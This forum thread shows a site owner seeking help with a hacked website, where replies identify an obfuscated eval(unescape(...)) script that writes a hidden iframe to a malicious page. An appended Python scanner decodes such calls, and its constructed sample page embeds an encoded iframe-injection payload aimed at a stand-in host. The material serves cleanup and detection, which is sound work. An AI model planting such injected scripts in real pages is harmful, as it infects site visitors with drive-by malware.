I have a website that has this virus. I have no idea what to do. I thought I had deleted the infected files. Anyone know what to do?
You should post the address of that site, breaking the link by replacing http with hxxp. Otherwise there’s not much we could tell.
Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.
Check here how to clean and make a website secure.
The site is hxxp://plasticsurgeryofutah.com
I have the Free version of Avast and it won’t give me the whole name or location of the bug… I checked my index page as well as some others to find some suspicious javascript or iframes, or anything else, but with no luck.
I actually deleted several files that had the virus in them (I think), but AVAST still says the virus is still there. I just don’t know how to find it. The website hxxp://www.unmaskparasites.com/ says that there is a suspicious script "eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D…" which I can’t find (even just the keyword eval) in my code.
Is there a chance I did delete it and avast and this “unmask” site are just using a cached version of the site or something like that? I just can’t figure it out.
Any help would be greatly appreciated.
I suggest you use Malwarebytes’ Anti-Malware.
Clean your browser cache and temporary files with ATF Cleaner or CCleaner (slim version).
Your site appears to have been hacked: there is a large chunk of obfuscated javascript on a single line just before the closing Body tag (see image1; I have broken the single line to make it easier to see).
avast isn’t alone in finding the home page infected, see http://www.virustotal.com/analisis/c4a376a993d00182db3bc0a49bd93b33043c83bd1165d2ddfc683e242219381f-1273716502, results of a scan of the actual page displayed.
See image2 of the obfuscated script having been decoded; it shows that it creates an iframe tag that points to a malicious site (see image3), which will run code in the in.php page it goes to…
Do you use content management software to create pages dynamically (php, sql, etc.)?
If so it is possible that your templates are what have been hacked.
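
Added example, not part of the original thread: a Python scanner for a downloaded copy of the site's files (pages, templates, scripts) that decodes heavily percent-encoded `unescape()` arguments, like the one unmaskparasites reported, and lists any iframe they write. The sample page, the `malicious.example` host and the extension list are constructed assumptions.

```python
import os
import re
from urllib.parse import unquote

UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])([^"']{20,})\1\s*\)""")
PCT = re.compile(r"%[0-9A-Fa-f]{2}")
IFRAME_SRC = re.compile(r"""<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
EXTENSIONS = (".html", ".htm", ".php", ".js", ".tpl", ".inc")  # assumed file types

def scan_text(text):
    """Return (line_no, decoded, iframe_srcs) for each mostly %XX unescape() call."""
    findings = []
    for m in UNESCAPE_CALL.finditer(text):
        arg = m.group(2)
        # Skip ordinary strings: require at least half the argument to be %XX escapes.
        if 3 * len(PCT.findall(arg)) < len(arg) // 2:
            continue
        decoded = unquote(arg, encoding="latin-1")  # JS unescape() maps %XX to Latin-1
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append((line_no, decoded, IFRAME_SRC.findall(decoded)))
    return findings

def scan_tree(root):
    """Scan every page, template and script under root; yield (path, finding)."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    for finding in scan_text(fh.read()):
                        yield path, finding

# Constructed sample: a clean page with one injected line just before </body>.
_payload = ("document.write('<iframe src=\"http://malicious.example/in.php\""
            " width=1 height=1></iframe>')")
_encoded = "".join("%%%02X" % b for b in _payload.encode("latin-1"))
SAMPLE_PAGE = (
    "<html><body>\n<h1>Welcome</h1>\n"
    "<script>document.title = unescape('Caf%E9');</script>\n"
    '<script>eval(unescape("' + _encoded + '"));</script>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    for line_no, decoded, srcs in scan_text(SAMPLE_PAGE):
        print(f"line {line_no}: iframe -> {srcs}\n  decoded: {decoded}")
```

Point `scan_tree()` at the local copy of the web root, CMS templates included, so a hit names the file and line that still carry the injected script.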